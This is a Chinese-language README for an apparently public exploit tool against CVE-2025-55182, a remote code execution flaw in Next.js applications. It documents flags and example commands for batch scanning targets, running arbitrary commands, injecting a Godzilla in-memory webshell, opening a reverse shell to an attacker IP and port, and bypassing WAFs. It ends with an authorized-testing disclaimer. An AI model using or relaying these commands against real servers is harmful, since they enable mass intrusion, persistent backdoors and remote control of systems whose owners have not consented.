CVE-2025-55182 漏洞扫描与利用工具,针对 Next.js 应用程序的远程代码执行漏洞。支持批量检测、命令执行、哥斯拉内存马注入以及反弹 Shell 功能。
⚠️ 本工具仅供安全研究和授权测试使用,请勿用于非法用途。
.txt 文件的文件夹。success.json,并可选输出漏洞 URL 到指定文件。[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
| 参数 | 类型 | 默认值 | 描述 |
|---|---|---|---|
-u | string | 无 | 单个目标 URL(例如 http://example.com:3000) |
-f | string | 无 | 包含 URL 列表的文件(每行一个) |
-d | string | 无 | 包含多个 .txt 文件的文件夹 |
-o | string | 无 | 输出文件(保存漏洞 URL,每行一个) |
-t | int | 10 | 并发线程数 |
-to | int | 10 | 请求超时时间(秒) |
-c | string | 无 | 要执行的命令(例如 id) |
-m | string | 无 | 模式:waf(启用 WAF 绕过) |
-p | string | 无 | HTTP 代理(例如 http://127.0.0.1:8080) |
-g | bool | false | 启用哥斯拉内存马注入 |
-rs | string | 无 | 反弹 Shell 地址(格式 IP:PORT) |
-dv | bool | false | 详细模式(打印每个 URL 的扫描过程) |
-es | bool | false | 敏感信息扫描模式 |
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
成功注入后,工具会输出哥斯拉的连接地址、密码、密钥和请求头信息。
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json:自动保存所有成功利用的目标详细信息(包括命令输出、哥斯拉配置等)。-o 指定的文件:保存漏洞 URL 列表(每行一个)。扫描过程中会实时显示进度条和已发现的漏洞,最终输出统计信息。
-p 参数设置代理。-to 参数值。本工具仅用于安全研究和授权测试,使用者需自行承担一切法律责任。开发者不对任何滥用行为负责。